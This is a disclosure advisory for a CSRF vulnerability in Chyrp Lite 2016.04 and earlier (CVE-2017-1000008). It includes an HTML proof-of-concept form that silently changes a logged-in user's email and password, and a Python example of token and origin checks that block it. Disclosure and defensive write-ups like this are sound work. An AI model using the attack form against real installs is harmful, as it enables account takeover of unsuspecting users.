Security Advisory – Cross Site Request Forgery in Chyrp Lite

Product: Chyrp Lite
Vendor: Open source community
Version: 2016.04 “Lago” and earlier
Category: Cross site request forgery (CSRF)
Vendor Notified: 2017-01-05
Patched: 2017-01-06
Disclosed: 2017-03-06
Researcher(s): Carl Pearson
CVE: CVE-2017-1000008

Summary
A cross-site request forgery (CSRF) vulnerability exists in the user properties function of the Chyrp Lite blog engine. An unauthenticated remote attacker can exploit the vulnerability by tricking authenticated users into visiting a webpage under attacker control.

Proof of Concept
Example HTML attack form:

<!-- The form submits when this button is clicked. -->
<button onclick="document.csrf_form.submit()">Click to run</button>
<!-- Edit the 'action' attribute to reflect the IP address or hostname of the victim's Chyrp install. -->
<form name="csrf_form" id="csrf_form" method="POST" action="http://[host]/?action=controls">
	<input class="text" type="text" name="login" value="user" id="login" disabled="disabled"/>
	<input type="text" name="full_name" value="" id="full_name" tabindex="1"/>
	<input type="text" name="email" value="user@example.com" id="email" tabindex="1"/>
	<input type="text" name="website" value="http://yahoo.com" id="website" tabindex="1"/>
	<input type="password" name="new_password1" value="apple" id="new_password1"/>
	<input type="password" name="new_password2" value="apple" id="new_password2"/>
</form>

Impact
If successful, an attacker can arbitrarily change the user’s password, email, and username to any desired values.

Solution
Chyrp Lite version 2017.01 “Swainson” patches this issue. Updating any existing Chyrp Lite installs is recommended.
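The class of fix for this advisory is a per-session anti-CSRF token that the settings form must carry and the controls handler must verify before writing anything. The following Python sketch is an added example, not Chyrp Lite's own code (the project's actual patch is in the linked commit): the HMAC-derived token scheme, the SITE_URL, the handler name and the two request dicts are all assumptions or constructed inputs for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlparse

# Constructed values for the example: a server secret and the blog's own origin.
SECRET_KEY = secrets.token_bytes(32)
SITE_URL = "http://blog.example"   # hypothetical victim Chyrp install


def csrf_token(session_id, secret=SECRET_KEY):
    """Derive a per-session token as HMAC-SHA256(secret, session_id).

    Deriving rather than storing means the server keeps no token table;
    the token is unguessable without the secret and is bound to the
    session it was issued for, so a foreign page cannot construct it.
    """
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf(session_id, submitted, secret=SECRET_KEY):
    """True only if the submitted token matches the session's token.

    compare_digest keeps the comparison constant-time.
    """
    if not submitted:
        return False
    return hmac.compare_digest(csrf_token(session_id, secret), submitted)


def same_origin(request):
    """Defence in depth: reject if Origin/Referer names a foreign site.

    Browsers send Origin on cross-site POSTs. A missing header is tolerated
    because some clients strip it, so this supplements the token check
    and never replaces it.
    """
    source = request["headers"].get("Origin") or request["headers"].get("Referer")
    if source is None:
        return True
    got, want = urlparse(source), urlparse(SITE_URL)
    return (got.scheme, got.netloc) == (want.scheme, want.netloc)


def handle_controls_post(request, secret=SECRET_KEY):
    """Simulated ?action=controls handler. Returns (status, message)."""
    session_id = request["cookies"].get("session")
    if session_id is None:
        return 403, "not logged in"
    if not same_origin(request):
        return 403, "cross-origin request rejected"
    form = request["form"]
    if not verify_csrf(session_id, form.get("csrf_token"), secret):
        return 403, "missing or invalid CSRF token"
    if form.get("new_password1") != form.get("new_password2"):
        return 400, "passwords do not match"
    # Only at this point would a real handler write email/website/password.
    return 200, "profile updated for session " + session_id


# Constructed request 1: the advisory's attack form as the victim's browser
# would replay it. The session cookie rides along automatically, but the
# attacker's page cannot know the token and the browser reports its Origin.
FORGED_REQUEST = {
    "cookies": {"session": "victim-session"},
    "headers": {"Origin": "http://attacker.example"},
    "form": {"email": "user@example.com", "website": "http://yahoo.com",
             "new_password1": "apple", "new_password2": "apple"},
}

# Constructed request 2: the same fields submitted from the blog's own
# settings page, which embedded the token in a hidden input.
LEGIT_REQUEST = {
    "cookies": {"session": "victim-session"},
    "headers": {"Origin": SITE_URL},
    "form": {"email": "user@example.com", "website": "http://yahoo.com",
             "new_password1": "apple", "new_password2": "apple",
             "csrf_token": csrf_token("victim-session")},
}

if __name__ == "__main__":
    print(handle_controls_post(FORGED_REQUEST))
    print(handle_controls_post({**FORGED_REQUEST, "headers": {}}))
    print(handle_controls_post(LEGIT_REQUEST))
```

The forged request is refused twice over: once by the origin check, and, if a client omitted the Origin header, again by the token check, because the attacker's page has no way to read the victim's token. Only the request from the blog's own page, carrying the token its form embedded, reaches the profile update.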

Reference
Project home: https://github.com/xenocrat/chyrp-lite
v2017.01 release notes: https://github.com/xenocrat/chyrp-lite/releases/tag/v2017.01
Changelog: https://github.com/xenocrat/chyrp-lite/commit/79bb2de7f57d163d256b6bdb127dc09cfdb6235a
OWASP CSRF overview: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

Edit 7/13/17: CVE identifier added.
